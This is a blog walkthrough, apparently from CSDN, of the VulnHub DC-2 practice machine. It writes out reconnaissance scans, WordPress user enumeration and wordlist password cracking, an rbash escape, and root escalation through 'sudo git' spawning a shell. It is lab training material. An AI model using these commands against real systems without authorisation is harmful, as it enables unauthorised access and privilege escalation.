DC-2打靶渗透【附代码】(权限提升)

最新推荐文章于 2024-08-13 19:51:47 发布
最新推荐文章于 2024-08-13 19:51:47 发布
阅读量732 收藏 12
点赞数 11
分类专栏: 打靶日常 文章标签: 笔记 学习 网络安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/141172029
版权

靶机下载地址:

DC: 2 ~ VulnHubDC: 2, made by DCAU. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/dc-2,311/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap 192.168.93.1/24

1.2. 端口扫描

nmap -p- 192.168.93.136

1.3. 目录扫描

dirb http://192.168.93.136

1.4. 敏感信息收集

whatweb http://192.168.93.136

2. WEB打点寻找漏洞点

发现访问不到,根据显示考虑IP未遵循重定向到域名

在本机的C:\Windows\System32\drivers\etc 修改hosts⽂件,添加192.168.93.136 dc-2

再次进行访问,可以访问到

点击flag,出现以下页面

由于敏感信息收集时发现CMS是wordpress

在后面拼接默认后台登录地址/wp-admin

使⽤wpscan⼯具枚举⽤户

wpscan --url http://dc-2 --enumerate u

发现了三个相关的用户名admin,jerry,tom 接下来就是密码,使用了Cewl工具

cewl http://dc-2/ > 1.txt

wpscan --url http://dc-2 --passwords 1.txt

获得账号密码

Username: jerry, Password: adipiscing Username: tom, Password: parturient

进行登录

发现第二个flag

flag2提示我们可以走另一个入口,让我想到了ssh

ssh tom@192.168.93.136 -p 7744

发现登录上了,进行权限查看,发现有rbash限制。有一些命令不能使用,发现echo命令export命令可以使用,我们使用echo命令查看一下系统命令还有啥能用。

echo $PATH
echo /home/tom/usr/bin/*

发现less,ls,scp,vi命令还是可以使用的,查找如何将rbash限制进行绕过,可以使用一下命令进行绕过。

# 利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a 
 
# 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

发现已经绕过入了,发现了第三个flag,查看一下flag3.txt。

flag3提示我们su,我感觉是要我们切换到另一个用户,在tom用户下切换到jerry用户,并查询一下用户下所有相关flag的文件

su jerry
adipiscing
find / -name *flag*

发现了falg4.txt,打开查看

cd /home/jerry/
ls
cat cat flag4.txt

3. 权限提升

尝试sudo提权

sudo -l

sudo git -p help config
!/bin/sh

id
cd /root
ls
cat final-flag.txt

Kucei
关注
  • 11
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-6打靶渗透代码】(权限提升)
最新发布
weixin_52487093的博客
08-13 297
DC-6打靶渗透代码】(权限提升)
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1065
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 961
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限
VulnHub靶机 DC-8 打靶实战 详细渗透过程
rumil的博客
04-24 1413
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
双向DC-DC变换器源代码_C语言_DC-DC_dcdc_stm32_双向dcdc_
10-01
这个“双向DC-DC变换器源代码”项目,提供了实现以上功能的完整代码框架,对于学习和理解如何利用STM32控制双向DC-DC变换器的开发者来说,是非常有价值的参考资料。通过研究和实践这个项目,不仅可以深入理解电源...
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
C++笔记5•内存管理•
qq_64446190的博客
08-12 688
内存管理
第二十五天培训笔记
weixin_70756988的博客
08-12 251
选项表示将所有的依赖和代码打包到一个单独的文件中,这样生成的可执行文件更便于。、设置清华镜像站(从国内下载安装包,提高下载和安装工具速度)文件夹中找到生成的可执行文件。可以将这个可执行文件拷贝。在不替换原有代码的情况下,应对数据库软件的升级)到其他机器上(即使该机器没有安装 Python。数据框架,用于保存从数据库中读取的数据)的工具,通过这个工具,就可以。上面命令执行失败:执行该命令。完成打包后,会在当前目录的。)修改为清华大学的镜像源。有完整的读取数据的工具,是知名的数据分析工具,
Linux源码阅读笔记20-PCI设备驱动详解
Lenn Louis' Scribe
08-08 393
代码】Linux源码阅读笔记20-PCI设备驱动详解。
网络安全自学笔记
2301_77160226的博客
08-07 1098
网络安全是指保护网络系统中的硬件、软件及其数据不因偶然或恶意的原因而遭到破坏、更改、泄露,保障系统连续可靠正常地运行,网络服务不中断。网络安全涵盖了众多方面,包括但不限于保护个人隐私、防止商业机密泄露、维护国家安全等。在当今数字化时代,几乎所有的信息交流和业务活动都依赖于网络,因此网络安全的重要性日益凸显。通过搭建实验环境,如使用虚拟机搭建一个包含服务器和客户端的网络,模拟各种网络攻击和防护场景,如进行 SQL 注入攻击的尝试,并实施相应的防护措施,如安装防火墙、使用加密技术等。
MongoDB学习笔记(三)
2303_76234920的博客
08-08 233
使用Python操作MongoDB:使用管理员用户:
江科大/江协科技 STM32学习笔记P21
sususu_2001的博客
08-08 1109
有ADC也有DAC数字模拟转换器,使用DAC可以将数字变量转化为模拟电压,与PWM相比较,PWM也有DAC的功能,同时PWM只有完全导通和完全断开两种状态,没有功率损耗,在直流电机调速这种大功率的应用场景使用PWM来等效模拟量比DAC更好。DAC的应用主要在波形生成,比如信号发生器、音频解码芯片等。AD转换需要花一小段时间,1us表示从AD转换开始到产生结果需要1us,对应AD转换的频率就是1MHz,是STM32ADC的最快转换频率。
sheng的学习笔记-AI-k近邻学习(kNN)
coldstarry的专栏
08-07 496
k近邻(k-Nearest Neighbor,简称kNN)学习是一种常用的监督学习方法,是一种基本的分类与回归方法。分类问题:对新的样本,根据其 k 个最近邻的训练样本的类别,通过多数表决等方式进行预测。回归问题:对新的样本,根据其 k 个最近邻的训练样本标签值的均值作为预测值。
16、电科院FTU检测标准学习笔记-基本性能2
sixtome
08-10 1064
作者简介:本人从事电力系统多年,岗位包含研发,测试,工程等,具有丰富的经验在配电自动化验收测试以及电科院测试中,本人全程参与,积累了不少现场的经验。
JUC并发编程与源码分析学习笔记(三)
xizheng2018的博客
08-09 194
ThreadLocal 该类提供线程局部变量1、ThreadLocal简介①、大厂面试题②、是什么?③、能干嘛?④、方法摘要。
dc-dc转换器使用代码
12-22
DC-DC转换器是一种电子设备,它可以将一种直流电压转换成另一种直流电压。它可以在各种电子设备中使用,比如手机充电器、电脑电源、汽车电子系统等。以下是一个简单的使用代码的例子: ``` // 定义输入电压 float inputVoltage = 12.0; // 定义输出电压 float outputVoltage = 5.0; // 计算转换效率 float efficiency = outputVoltage / inputVoltage; // 设置最大电流 float maxCurrent = 2.0; // 检查输入电压是否在指定范围内 if (inputVoltage < 10.0 || inputVoltage > 15.0) { // 如果输入电压不在指定范围内,输出错误信息 Serial.println("Input voltage out of range"); } else { // 如果输入电压在指定范围内,计算输出电流 float outputCurrent = maxCurrent * efficiency; // 输出转换后的电流 Serial.print("Output current: "); Serial.print(outputCurrent); Serial.println(" A"); } ``` 在这个例子中,我们首先定义了输入电压和输出电压的数值。然后计算了转换效率,并设置了最大电流。接着通过条件语句检查输入电压是否在指定范围内,如果不在范围内则输出错误信息,如果在范围内则计算输出电流,并输出到串行监视器上。这个简单的代码演示了如何使用DC-DC转换器,并且可以根据实际需求进行修改和扩展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值